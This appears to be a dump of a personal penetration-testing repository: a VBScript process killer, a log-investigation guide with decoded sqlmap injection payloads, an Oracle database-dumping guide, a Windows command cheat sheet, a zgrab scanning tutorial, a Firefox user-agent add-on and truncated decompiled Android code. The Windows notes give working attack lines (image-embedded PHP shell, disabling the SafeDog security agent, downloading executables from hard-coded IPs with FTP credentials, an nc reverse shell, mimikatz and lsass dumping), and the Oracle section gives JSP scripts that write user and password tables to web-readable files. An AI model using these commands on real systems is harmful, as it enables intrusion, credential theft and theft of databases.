' Lists running processes, or terminates the ones selected on the command line.
' As the code reads: argument 0 is a process name, optional argument 1 is a PID.
' Errors are suppressed for the whole script, so a missing argument leaves the
' matching variable Empty instead of stopping execution, and a failed
' Terminate call is not reported.
On Error Resume Next
Dim obj, pross, pid, killName
pid = WScript.Arguments(1)
killName = WScript.Arguments(0)

' Local WMI namespace root\cimv2, queried with the caller's impersonated identity.
Set obj = GetObject("Winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set pross = obj.Execquery("Select * From Win32_Process")
Wscript.echo "[PID]" & VbTab & "[ProName]"

For Each proccess In pross
    ' Exactly two arguments: terminate the process whose PID equals argument 1.
    If (WScript.Arguments.Count = 2) And (CStr(pid) = CStr(proccess.ProcessID)) Then
        proccess.Terminate 0
    ' Any argument count: a case-insensitive name match on argument 0 also
    ' terminates the process, so in two-argument mode both the PID and every
    ' process with that name are affected.
    ElseIf Ucase(proccess.Name) = Ucase(killName) Then
        proccess.Terminate 0
    ' Everything else is only listed as "PID <tab> name".
    Else
        WScript.echo proccess.ProcessID & VbTab & proccess.Name
    End If
Next
23 |
--------------------------------------------------------------------------------
/note/audit-log.md:
--------------------------------------------------------------------------------
1 |
2 | #运维日志排查记录
3 | ## 前言
4 | 记录一些排查常见日志的命令,方法wiki,欢迎补充(Markdown 语法)。
5 |
6 | ##常用命令
7 |
8 | 1. 查找关键词并统计行数
9 | ```bash
10 | cat 2015_7_25_test_access.log | grep "sqlmap" | wc -l
11 | ```
12 | 2. 删除含有匹配字符的行(`sed -i` 会原地改写日志;取证排查时应先备份原始文件,在副本上操作)
13 | ```bash
14 | sed -i '/Indy Library/d' 2015_7_25_test_access.log
15 | ```
16 | 3. 查找所有日志中的关键词
17 | ```bash
18 | find ./ -name "*.log" |xargs grep "sqlmap" |wc -l
19 | ```
20 | 4. 获取特殊行(如id)并且排序统计
21 | ```bash
22 | cat cszl988.log | awk '{print $1}' | awk -F : '{print $2}' | sort -u | wc -l
23 | ```
24 | 5. 正则匹配内容(如提取ip)
25 | ```bash
26 | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}"
27 | ```
28 | 6. 去重并统计数量
29 | ```bash
30 | tail 3.log | awk '{print $7}' | sort | uniq -c
31 | ```
32 | 7. 批量提取(全流量中)数据包并且过滤数据
33 | ```bash
34 | #!/bin/bash
35 | for file in ` ls $1 `
36 | do
37 | parse_pcap -vvb $file | grep -v "Host:" | grep -v "Cookie:" | grep -v "User-Agent:" | grep -v "Accept:" | grep -v "Accept:" | grep -v "Accept-Language:" | grep -v "Accept-Encoding:" | grep -v "Connection:" | grep -v "Content-Type:" | grep -v "Content-Length" | grep -v "Server"
38 | done
39 | ```
40 | 8. url 解码(`xargs` 默认会把多条输入合并到一次调用,而脚本只解码 `sys.argv[1]`;需要逐条解码时给 `xargs` 加上 `-n 1`)
41 | ```bash
42 | cat luban.log | grep sqlmap | awk '{print $7}' | xargs python -c 'import sys, urllib; print urllib.unquote(sys.argv[1])'
43 | ```
44 | 9. 欢迎补充....
45 |
46 |
47 | ##示范:xxxx站注入日志排查
48 | * 查看所有sqlmap注入记录条数
49 | ```bash
50 | [root@pentest temp]# cat luban.log | grep sqlmap | wc -l
51 | 1241
52 | ```
53 | * 预览几条url
54 | ```bash
55 | cat luban.log | grep sqlmap | awk '{print $7}' | more
56 | /news.php?id=771%28.%28%22%29.%27%29%29%27&fid=168
57 | /news.php?id=771%27IddP%3C%27%22%3EvCBw&fid=168
58 | /news.php?id=771%29%20AND%201148%3D8887%20AND%20%288975%3D8975&fid=168
59 | /news.php?id=771%29%20AND%208790%3D8790%20AND%20%287928%3D7928&fid=168
60 | /news.php?id=771%20AND%204294%3D9647&fid=168
61 | /news.php?id=771%20AND%208790%3D8790&fid=168
62 | /news.php?id=771%27%29%20AND%205983%3D7073%20AND%20%28%27UwRr%27%3D%27UwRr&fid=168
63 | /news.php?id=771%27%29%20AND%208790%3D8790%20AND%20%28%27hwaT%27%3D%27hwaT&fid=168
64 | /news.php?id=771%27%20AND%206578%3D7565%20AND%20%27EoTZ%27%3D%27EoTZ&fid=168
65 | /news.php?id=771%27%20AND%208790%3D8790%20AND%20%27lBdL%27%3D%27lBdL&fid=168
66 | /news.php?id=771%25%27%20AND%205177%3D1107%20AND%20%27%25%27%3D%27&fid=168
67 | /news.php?id=771%25%27%20AND%208790%3D8790%20AND%20%27%25%27%3D%27&fid=168
68 | ```
69 | * 方便查看 urldecode
70 | ```bash
71 | cat luban.log | grep sqlmap | awk '{print $7}' | xargs python -c 'import sys, urllib; print urllib.unquote(sys.argv[1])'
72 | /news.php?id=771&fid=168
73 | /news.php?id=771&fid=168 AND ASCII(SUBSTRING((SELECT DISTINCT(COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32)))) FROM pg_tables OFFSET 1 LIMIT 1)::text FROM 3 FOR 1))>
74 | 97
75 | /news.php?id=771&fid=168 UNION ALL SELECT NULL,(CHR(113)||CHR(122)||CHR(106)||CHR(120)||CHR(113))||(CHR(103)||CHR(75)||CHR(78)||CHR(87)||CHR(76)||CHR(74)||CHR(110)||CHR(1
76 | 15)||CHR(100)||CHR(85))||(CHR(113)||CHR(122)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL,NULL,NULL,NULL,NULL UNION ALL SELECT NULL,(CHR(113)||CHR(122)||CHR(106)||CHR(120)||CHR(113))||(CHR(113)||CHR(71)||C
77 | HR(74)||CHR(82)||CHR(101)||CHR(120)||CHR(69)||CHR(112)||CHR(117)||CHR(79))||(CHR(113)||CHR(122)||CHR(120)||CHR(113)||CHR(113)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
78 | ```
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
--------------------------------------------------------------------------------
/note/linux.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/note/linux.txt
--------------------------------------------------------------------------------
/note/oracle.md:
--------------------------------------------------------------------------------
1 | Oracle拖库指南
2 | ===================================
3 | ###目录
4 |
5 | 1 常用sql语句
6 | 2 sqlplus
7 | 3 jsp 脱裤脚本
8 | 4 Asp .net 版脱裤脚本
9 | 5 ColdFusion 版脱裤脚本
10 | 6 oracle 整表预览 jsp 脚本
11 | 7 编码
12 | 8 参考
13 |
14 | ###常用sql语句
15 | 查询所有表
16 |
17 | SELECT * FROM ALL_TABLES
18 |
19 | 查询当前用户表
20 |
21 | select table_name from user_tables;
22 |
23 |
24 | 查询所有表按大小排序
25 |
26 | SELECT TABLE_NAME,NUM_ROWS FROM ALL_TABLES order by NUM_ROWS desc
27 | select table_name,NUM_ROWS from user_tables order by NUM_ROWS desc
28 |
29 | 查询表前十条
30 |
31 | select * from users where rownum < 10
32 |
33 | 分页查询 2000000 到 4000000
34 |
35 | SELECT * FROM (SELECT e.*,ROWNUM rn FROM (select * from user ) e WHERE ROWNUM <= 4000000) WHERE rn > 2000000
36 |
37 | ###sqlplus
38 |
39 | ####rpm 安装
40 |
41 | http://eduunix.ccut.edu.cn/index2/database/Oracle%20Instant%20Client/oracle-instantclient-sqlplus-11.1.0.1-1.i386.rpm
42 | http://eduunix.ccut.edu.cn/index2/database/Oracle%20Instant%20Client/oracle-instantclient-basic-11.1.0.1-1.i386.rpm
43 | rpm -ivh oracle-instantclient-sqlplus-11.1.0.1-1.i386.rpm
44 | rpm -ivh oracle-instantclient-basic-11.1.0.1-1.i386.rpm
45 |
46 | 配置libs
47 |
48 | vi /etc/ld.so.conf
49 | /usr/lib/oracle/11.1.0.1/client/lib/
50 |
51 | 连接
52 |
53 | 交互式操作
54 |
55 | sqlplus usewr/pass@172.100.100.41:1521/orabi
56 | @/tmp/1.sql
57 | 非交互式
58 |
59 | sqlplus -s user/pass@172.100.100.41 @/tmp/1.sql
60 |
61 | 1.sql
62 |
63 |
64 | SET feedback off
65 | SET newpage NONE
66 | SET pagesize 50000
67 | SET linesize 300
68 | SET verify off
69 | SET pagesize 0
70 | SET term off
71 | SET trims ON
72 | SET heading off
73 | SET trimspool ON
74 | SET trimout ON
75 | SET timing off
76 | SET verify off
77 | SET colsep |
78 | spool /var/www/css/1.txt
79 | SELECT user_name||','||password||','||DATA||','||id FROM USER WHERE rownum < 100 ;
80 | spool off
81 |
82 |
83 | ####导出CSV格式
84 |
85 |
86 | SET feedback off
87 | SET newpage NONE
88 | SET pagesize 0
89 | SET linesize 5000
90 | SET verify off
91 | SET term off
92 | SET trims ON
93 | SET heading off
94 | SET trimspool ON
95 | SET trimout ON
96 | SET timing off
97 | SET verify off
98 | SET colsep |
99 | spool D:\007.csv
100 | SELECT 'id,username,password' FROM dual;
101 | SELECT id||','||username||','||password FROM admin WHERE rownum<100;
102 | spool off
103 |
104 |
105 |
106 | ###jsp 脱裤脚本
107 |
108 | <%@ page contentType="text/html;charset=UTF-8"%>
109 | <%@ page import="java.io.*,java.lang.*,java.sql.*"%>
110 | <%
111 |
112 | Class.forName("oracle.jdbc.driver.OracleDriver");
113 | Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@172.0.0.1:1521:orabi", "admin", "admin");
114 | File f = new File("/webapps/ROOT/css/t1.txt");
115 | BufferedWriter bw = new BufferedWriter(new FileWriter(f));
116 | Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
117 | ResultSet rs=stmt.executeQuery("select * from member where rownum > 2000000");
118 | ResultSetMetaData rsmd = rs.getMetaData();
119 | int numberOfColumns = rsmd.getColumnCount();
120 | for(int i=1;i
142 |
143 |
144 | ###ColdFusion 版脱裤脚本
145 |
146 |
147 |
148 |
149 |
150 | SELECT * FROM MEMBER
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 | ###oracle 整表预览 jsp 脚本
160 |
161 | <%@ page contentType="text/html;charset=UTF-8"%>
162 | <%@ page import="java.io.*,java.lang.*,java.sql.*"%>
163 | <%
164 |
165 | Class.forName("oracle.jdbc.driver.OracleDriver");
166 | Connection conn = DriverManager.getConnection("jdbc:oracle:thin:@127.0.0.1:1521", "admin", "password");
167 | Statement stmt=conn.createStatement(ResultSet.TYPE_SCROLL_SENSITIVE,ResultSet.CONCUR_UPDATABLE);
168 | String html="";
169 | File file = new File("/tmp/data.txt");
170 | BufferedReader br = new BufferedReader(new FileReader(file));
171 | String line;
172 | while ((line = br.readLine()) != null) {
173 |
174 | html=html+""+line+":
";
175 | ResultSet rs=stmt.executeQuery("select * from "+line+" where rownum < 100");
176 | ResultSetMetaData rsmd = rs.getMetaData();
177 | int numberOfColumns = rsmd.getColumnCount();
178 | for(int i=1;i"+rsmd.getColumnName(i)+"";
181 | }
182 | html+="
";
183 | while (rs.next())
184 | {
185 |
186 | html+="";
187 | for(int i=1;i"+rs.getString(i)+"";
190 |
191 |
192 | }
193 | html+="
";
194 | }
195 | rs.close();
196 | html+="|
";
197 | }
198 | File f = new File("/tmp/info.css");
199 | BufferedWriter bw = new BufferedWriter(new FileWriter(f));
200 | bw.write(html);
201 |
202 |
203 | bw.close();
204 | br.close();
205 | stmt.close();
206 | conn.close();
207 |
208 | %>
209 |
210 | ###编码问题
211 |
212 | 查询当前编码
213 |
214 | select userenv('language') from dual;
215 |
216 | 命令行执行
217 |
218 | export NLS_LANG="american_america.AL32UTF8"
219 |
220 | ###参考
221 |
222 | http://liuxun.org/blog/linux-xia-occi-bian-cheng/
223 |
--------------------------------------------------------------------------------
/note/windows.txt:
--------------------------------------------------------------------------------
1 | 1:合成shell
2 | copy xx.png /b +think.php /a 1.jpg
3 |
4 | 2:取消共享文件夹安全警告
5 | @echo off
6 | Reg add HKCU\Software\Microsoft\Windows\CurrentVersion\PolicIEs\Associations /v LowRiskFileTypes /t REG_SZ /d .exe;.reg;.msi;.bat;.cmd;.com;.vbs;.hta;.scr;.pif;.js;.lnk; /f
7 |
8 | 3:搞死安全狗 3.x
9 | ntsd -c q -pn SafeDogGuardCenter.exe
10 | 4:命令行ftp一句话下载
11 | cd c:\temp\ && echo set xPost = createObject("Microsoft.XMLHTTP") > 1.vbs && echo xPost.Open "GET","http://23.92.17.103/scripts/x",0 >> 1.vbs && echo xPost.Send() >> 1.vbs && echo Set sGet = createObject("ADODB.Stream") >> 1.vbs && (echo sGet.Mode = 3) >> 1.vbs && (echo sGet.Type = 1) >> 1.vbs && echo sGet.Open() >> 1.vbs && echo sGet.Write(xPost.responseBody) >> 1.vbs && echo sGet.SaveToFile "x" >> 1.vbs && cscript 1.vbs
12 | (echo open 123.242.230.24)> c:/temp/1.txt && (echo tonysir)>>c:/temp/1.txt && (echo 5Zk3Kcmv)>>c:/temp/1.txt && (echo type binary) >> c:/temp/1.txt && echo get 1.exe >> c:/temp/1.txt && echo bye >> c:/temp/1.txt && ftp -s:c:/temp/1.txt && dir c:\temp
13 | 5:nc 反弹
14 | /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
15 |
16 | 6:rar 压缩
17 | rar a -r d:/d.rar d:/test ( -r 子目录)
18 |
19 | 7:NC
20 | nc -v -L -p 443
21 | nc -nvv 127.0.0.1 200
22 | nc -t -e cmd.exe 192.168.1.102 2012
23 | nc -nvv 127.0.0.1 443
24 |
25 | 8:mimikatz
26 | @echo off
27 | cd %~dp0
28 | mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
29 | pause
30 |
31 | Procdump.exe -accepteula -ma lsass.exe lsass.dmp
32 |
33 |
34 |
35 |
36 | mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
37 |
38 | 9:dir
39 |
40 | dir /s
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
--------------------------------------------------------------------------------
/note/zgrab_1.md:
--------------------------------------------------------------------------------
1 | # 基于zmap 的应用层扫描器 zgrab (一)
2 |
3 | ## 介绍
4 | zgrab 是基于zmap无状态扫描的应用层扫描器,可以自定义数据包,以及ip,domain之间的关联。可用于快速指纹识别爆破等场景。
5 |
6 | ## 安装
7 | * go环境
8 |
9 | * zgrab
10 |
11 | ```bash
12 | go get github.com/zmap/zgrab
13 | cd $GOPATH/src/github.com/zmap/zgrab
14 | go build
15 | ```
16 | ## 使用
17 |
18 | ### 参数
19 | zgrab -help
20 |
21 | | 参数 | 注释 | 示范 |
22 | | -------- | -----: | -----: |
23 | | port | 端口 | --port 80 |
24 | | data | 发送数据包并且返回响应 | --data http-req-domain |
25 |
26 | ### 输入
27 | #### zmap 扫描结果
28 | 输入流可以使用zmap 的扫描结果,例如项目主页的例子
29 |
30 | ```bash
31 | zmap -p 443 --output-fields=* | ztee results.csv | zgrab --port 443 --tls --data=./http-req --output-file=banners.json
32 | ```
33 | 其中 http-req 为自定义的数据包
34 |
35 | ```bash
36 | [root@pw_node_1 zgrab]# cat http-req
37 | GET / HTTP/1.1
38 | Host: %s
39 | ```
40 | #### 域名列表
41 | ip,domain 的文件,例如
42 |
43 | ```bash
44 | [root@pw_node_1 zgrab]# cat 2.csv
45 | 36.51.255.148,tinyjun.com
46 | 36.51.255.148,i6618.com
47 | 36.51.255.148,www.linwen.com
48 | 36.51.255.148,lujunda.cn
49 | 36.51.255.148,haohaomai.com
50 | 36.51.255.148,it1208.com
51 | 36.51.255.148,www.lijinmao.com
52 | 36.51.255.148,lushao.cn
53 | 36.51.255.148,i6618.com
54 | 36.51.255.148,www.it-case.com
55 | 36.51.255.148,zhihub.com
56 | 36.51.255.148,wwww.yaseng.org
57 | ```
58 | cat 2.csv | ./zgrab --port 80 --data http-req-domain
59 | ### 输出
60 | 默认输出为json ,可以使用jq 工具解析
61 | ### 示范
62 | 扫描 127.0.0.1,localhost
63 | 效果如图
64 | 
65 |
66 | 命令行
67 |
68 | ```bash
69 | [root@pw_node_1 zgrab]# cat 3.csv
70 | 127.0.0.1,localhost
71 | [root@pw_node_1 zgrab]# cat /tmp/3.csv | ./zgrab --port 80 --data http-req-domain | jq "."
72 | {
73 | "data": {
74 | "write": "GET / HTTP/1.1\r\nHost: localhost\r\n\r\n",
75 | "read": "HTTP/1.1 200 OK\r\nDate: Sun, 27 Dec 2015 17:33:43 GMT\r\nServer: Apache/2.2.15 (CentOS)\r\nLast-Modified: Fri, 11 Dec 2015 14:51:21 GMT\r\nETag: \"82db1-e-526a074ea5571\"\r\nAccept-Ranges: bytes\r\nContent-Length: 14\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\nhello yaseng\n"
76 | },
77 | "timestamp": "2015-12-28T01:33:43+08:00",
78 | "domain": "localhost",
79 | "ip": "127.0.0.1"
80 | }
81 | {
82 | "sni_support": true,
83 | "ca_file_name": null,
84 | "mail_type": null,
85 | "tls_version": null,
86 | "timeout": 10,
87 | "port": 80,
88 | "success_count": 1,
89 | "failure_count": 0,
90 | "total": 1,
91 | "start_time": "2015-12-28T01:33:43+08:00",
92 | "end_time": "2015-12-28T01:33:43+08:00",
93 | "duration": 0,
94 | "senders": 1000
95 | }
96 | [root@pw_node_1 zgrab]# curl localhost
97 | hello yaseng
98 | [root@pw_node_1 zgrab]#
99 | ```
100 | ### 自定义数据包
101 | 可以自定义http 数据包,例如
102 |
103 | ```bash
104 | [root@pw_node_1 zgrab]# cat http-req-domain
105 | GET /1.php HTTP/1.1
106 | Host: %d
107 | ```
108 |
109 | ## 实例:快速指纹识别
110 | 例如需要在一大批域名列表里面快速识别wordpress,并且输出域名。
111 | 首先从 header 里面找出 wp 的指纹
112 |
113 | ```bash
114 | [root@pw_node_1 zgrab]# curl -I yaseng.org
115 | HTTP/1.1 200 OK
116 | Server: nginx/1.2.6
117 | Date: Sun, 27 Dec 2015 17:59:25 GMT
118 | Content-Type: text/html; charset=UTF-8
119 | Connection: keep-alive
120 | Expires: Thu, 19 Nov 1981 08:52:00 GMT
121 | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
122 | Pragma: no-cache
123 | X-Pingback: http://yaseng.org/xmlrpc.php
124 | Via: 10.17.21.22
125 | Set-Cookie: saeut=11111151239164757346; path=/; max-age=311040000
126 | Set-Cookie: PHPSESSID=86483bb31b614b6f5a9513854a27e321; path=/; HttpOnly
127 | ```
128 | 使用 字符串 X-Pingback 来做识别指纹
129 | 识别命令为
130 |
131 | ```bash
132 | cat domain.log | ./zgrab --port 80 --data http-req-domain | grep 'X-Pingback' | jq '.domain' | awk -F '"' '{print $2}'
133 | ```
134 |
135 | 其中 domain.log 为 1w 条 ip,domain 格式的 IP 到域名映射
136 | 分分钟即可识别完,示范如图
137 | 
138 |
139 | ## 参考
140 | 1:https://github.com/zmap/zgrab
141 |
142 |
--------------------------------------------------------------------------------
/project/device_mode_toggle/@devicemodetoggle-1.0.0.xpi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/device_mode_toggle/@devicemodetoggle-1.0.0.xpi
--------------------------------------------------------------------------------
/project/device_mode_toggle/README.md:
--------------------------------------------------------------------------------
1 | #device mode toggle
2 | @author yaseng@uauc.net
3 | @desc a simple device mode toggle tool
4 |
5 |
6 | ## 相关资料
7 |
8 | firefox 扩展开发笔记(一):jpm 使用实践以及调试
9 | http://yaseng.org/firefox-addon-development-notes-with-jpm.html
10 |
11 | firefox 扩展开发笔记(二):进阶开发之移动设备模拟
12 | http://yaseng.org/firefox-addon-mobile-device-toggle.html
13 |
--------------------------------------------------------------------------------
/project/device_mode_toggle/data/icon-16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/device_mode_toggle/data/icon-16.png
--------------------------------------------------------------------------------
/project/device_mode_toggle/data/icon-32.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/device_mode_toggle/data/icon-32.png
--------------------------------------------------------------------------------
/project/device_mode_toggle/data/icon-48.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/device_mode_toggle/data/icon-48.png
--------------------------------------------------------------------------------
/project/device_mode_toggle/data/icon-64.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yaseng/pentest/e98a4c310439adbd4e8bbb4ec5abf4bb00608676/project/device_mode_toggle/data/icon-64.png
--------------------------------------------------------------------------------
/project/device_mode_toggle/index.js:
--------------------------------------------------------------------------------
1 | /**
2 | *@name index.js
3 | *@desc a simple device mode toggle tool
4 | *@author yaseng@uauc.net
5 | **/
6 |
7 |
8 | var { ToggleButton } = require("sdk/ui/button/toggle");
9 | var prefs = require("sdk/preferences/service");
// Name of the preference that handleClick sets and resets.
var key = 'general.useragent.override';

// Toolbar toggle button; handleClick is called on every state change.
var button = ToggleButton({
  id: 'Mobile-toggle',
  label: 'Toggle mobile mode',
  icon: {
    '16': './icon-16.png',
    '32': './icon-32.png',
    '64': './icon-64.png'
  },
  onChange: handleClick
});
23 |
24 |
/**
 * Toggle handler: while the button is checked, store an iPhone Safari
 * User-Agent string under the preference named by `key`; when it is
 * unchecked, reset that preference.
 *
 * @param {Object} state  button state; only `state.checked` is read
 */
function handleClick(state) {
  var mobileUserAgent = 'Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4';

  if (!state.checked) {
    // Note: reset clears the preference entirely, including any value the
    // user had set before enabling the toggle.
    prefs.reset(key);
    return;
  }

  prefs.set(key, mobileUserAgent);
}
--------------------------------------------------------------------------------
/project/device_mode_toggle/package.json:
--------------------------------------------------------------------------------
1 | {
2 | "title": "device mode toggle",
3 | "name": "devicemodetoggle",
4 | "version": "1.0.0",
5 | "description": "a simple device mode toggle tool",
6 | "main": "index.js",
7 | "author": "yaseng@uauc.net",
8 | "homepage" : "http://www.yaseng.org",
9 | "icon": "resource://@devicemodetoggle/data/icon-48.png",
10 | "engines": {
11 | "firefox": ">=38.0a1",
12 | "fennec": ">=38.0a1"
13 | },
14 | "license": "MIT",
15 | "keywords": [
16 | "jetpack"
17 | ]
18 | }
19 |
--------------------------------------------------------------------------------
/project/device_mode_toggle/test/test-index.js:
--------------------------------------------------------------------------------
1 | var main = require("../");
2 |
// Smoke test: passes as soon as the test runner executes it.
exports['test main'] = function (assert) {
  assert.pass('Unit test running!');
};

// Same smoke test for the asynchronous (done-callback) form.
exports['test main async'] = function (assert, done) {
  assert.pass('async Unit test running!');
  done();
};

// NOTE(review): index.js as listed alongside this file assigns nothing to
// `exports`, so `main.dummy` looks undefined and this test would throw
// rather than assert -- confirm against the add-on's entry point.
exports['test dummy'] = function (assert, done) {
  var onText = function (text) {
    assert.ok((text === 'foo'), "Is the text actually 'foo'");
    done();
  };
  main.dummy('foo', onText);
};

require('sdk/test').run(exports);
20 |
--------------------------------------------------------------------------------
/project/diy_cloudplay/g.smali:
--------------------------------------------------------------------------------
1 | .class public Lcom/xunlei/cloud/action/search/g;
2 | .super Ljava/lang/Object;
3 | .source "SnifferParser.java"
4 |
5 |
6 | # static fields
7 | .field public static a:Lcom/xunlei/cloud/util/af;
8 |
9 |
10 | # direct methods
# Static initializer: builds a com.xunlei.cloud.util.af instance from this
# class object and stores it in the static field `a`.
# NOTE(review): `af` is an obfuscated name; it is presumably a per-class
# logger/helper, but nothing here shows what it does -- confirm.
# NOTE(review): the method name reads `constructor` and the invoke target
# below has no method name; the angle-bracketed names appear to have been
# lost when this listing was extracted.
.method static constructor ()V
    .locals 2

    .prologue
    .line 28
    new-instance v0, Lcom/xunlei/cloud/util/af;

    const-class v1, Lcom/xunlei/cloud/action/search/g;

    invoke-direct {v0, v1}, Lcom/xunlei/cloud/util/af;->(Ljava/lang/Class;)V

    sput-object v0, Lcom/xunlei/cloud/action/search/g;->a:Lcom/xunlei/cloud/util/af;

    .line 213
    return-void
.end method
27 |
# Instance constructor: only chains to the java.lang.Object constructor.
# NOTE(review): the invoke target has no method name in this listing; the
# angle-bracketed name appears to have been lost in extraction.
.method public constructor ()V
    .locals 0

    .prologue
    .line 27
    invoke-direct {p0}, Ljava/lang/Object;->()V

    return-void
.end method
37 |
# Case conversion selected by an integer mode.
#   p0 - input string
#   p1 - mode: 1 = upper case, 2 = lower case, anything else = unchanged
# Returns the converted string (or p0 itself for other modes).  Conversion
# always uses the fixed locale en_US.
.method private static a(Ljava/lang/String;I)Ljava/lang/String;
    .locals 3
    .parameter
    .parameter

    .prologue
    .line 366
    # v0 = new Locale("en", "US")
    new-instance v0, Ljava/util/Locale;

    const-string v1, "en"

    const-string v2, "US"

    invoke-direct {v0, v1, v2}, Ljava/util/Locale;->(Ljava/lang/String;Ljava/lang/String;)V

    .line 367
    # Dispatch on p1; values outside the table fall through to the return.
    packed-switch p1, :pswitch_data_0

    .line 380
    :goto_0
    return-object p0

    .line 369
    :pswitch_0
    invoke-virtual {p0, v0}, Ljava/lang/String;->toUpperCase(Ljava/util/Locale;)Ljava/lang/String;

    move-result-object p0

    goto :goto_0

    .line 373
    :pswitch_1
    invoke-virtual {p0, v0}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;

    move-result-object p0

    goto :goto_0

    .line 367
    nop

    # Switch table starting at key 1: 1 -> pswitch_0, 2 -> pswitch_1.
    :pswitch_data_0
    .packed-switch 0x1
        :pswitch_0
        :pswitch_1
    .end packed-switch
.end method
85 |
# Trims a fixed number of characters from both ends of a string.
#   p0 - input string
#   p1 - number of characters to drop from the start
#   p2 - number of characters to drop from the end
# Returns p0.substring(p1, p0.length() - p2), or null when the start index
# would be greater than the end index.
.method private static a(Ljava/lang/String;II)Ljava/lang/String;
    .locals 2
    .parameter
    .parameter
    .parameter

    .prologue
    .line 318
    # v0 = start index (p1 + 0)
    add-int/lit8 v0, p1, 0x0

    .line 319
    invoke-virtual {p0}, Ljava/lang/String;->length()I

    move-result v1

    # v1 = end index (length - p2)
    sub-int/2addr v1, p2

    .line 320
    if-le v0, v1, :cond_0

    .line 321
    # start > end: nothing to return
    const/4 v0, 0x0

    .line 325
    :goto_0
    return-object v0

    .line 324
    :cond_0
    invoke-virtual {p0, v0, v1}, Ljava/lang/String;->substring(II)Ljava/lang/String;

    move-result-object v0

    goto :goto_0
.end method
121 |
# Wraps a string with a prefix and a suffix.
#   p0 - the string in the middle
#   p1 - prefix
#   p2 - suffix
# Returns p1 + p0 + p2, built with a StringBuilder.
.method private static a(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)Ljava/lang/String;
    .locals 2
    .parameter
    .parameter
    .parameter

    .prologue
    .line 312
    new-instance v0, Ljava/lang/StringBuilder;

    invoke-direct {v0}, Ljava/lang/StringBuilder;->()V

    .line 313
    # Append order: p1, then p0, then p2.
    invoke-virtual {v0, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v1

    invoke-virtual {v1, p0}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    move-result-object v1

    invoke-virtual {v1, p2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;

    .line 314
    invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;

    move-result-object v0

    return-object v0
.end method
152 |
# Extracts the part of a string that lies between a start marker and an end
# marker.  Parameter roles as the bytecode uses them:
#   p0 - input string
#   p1 - when true, the start marker is not searched for; position 0 is used
#   p2 - start marker
#   p3 - when true, a missing start marker makes the method return null;
#        when false, position 0 is used instead
#   p4 - when true, everything after the start marker is returned and the end
#        marker is ignored
#   p5 - end marker, searched from the start position
#   p6 - when true, a missing end marker makes the method return null;
#        when false, everything after the start marker is returned
# In every path the length of p2 is added to the start position, including
# the paths where p2 was not searched for or not found.
.method private static a(Ljava/lang/String;ZLjava/lang/String;ZZLjava/lang/String;Z)Ljava/lang/String;
    .locals 4
    .parameter
    .parameter
    .parameter
    .parameter
    .parameter
    .parameter
    .parameter

    .prologue
    # v2 = null (the failure result), v0 = start position, v3 = -1 (indexOf "not found")
    const/4 v2, 0x0

    const/4 v0, 0x0

    const/4 v3, -0x1

    .line 332
    # p1 false -> search for the start marker at cond_1
    if-eqz p1, :cond_1

    .line 345
    :cond_0
    :goto_0
    const-string v1, ""

    .line 346
    # p4 false -> look for the end marker at cond_2
    if-eqz p4, :cond_2

    .line 347
    # p4 true: return p0.substring(start + p2.length())
    invoke-virtual {p2}, Ljava/lang/String;->length()I

    move-result v1

    add-int/2addr v0, v1

    invoke-virtual {p0, v0}, Ljava/lang/String;->substring(I)Ljava/lang/String;

    move-result-object v0

    .line 361
    :goto_1
    return-object v0

    .line 335
    :cond_1
    invoke-virtual {p0, p2}, Ljava/lang/String;->indexOf(Ljava/lang/String;)I

    move-result v1

    .line 336
    # start marker found -> cond_5 copies its index into v0
    if-ne v1, v3, :cond_5

    .line 337
    # start marker missing: continue from position 0 unless p3 demands failure
    if-eqz p3, :cond_0

    move-object v0, v2

    .line 338
    goto :goto_1

    .line 349
    :cond_2
    invoke-virtual {p0, p5, v0}, Ljava/lang/String;->indexOf(Ljava/lang/String;I)I

    move-result v1

    .line 350
    # end marker found -> cond_4 returns the text between the markers
    if-ne v1, v3, :cond_4

    .line 351
    # end marker missing: return the tail unless p6 demands failure
    if-eqz p6, :cond_3

    move-object v0, v2

    .line 352
    goto :goto_1

    .line 354
    :cond_3
    invoke-virtual {p2}, Ljava/lang/String;->length()I

    move-result v1

    add-int/2addr v0, v1

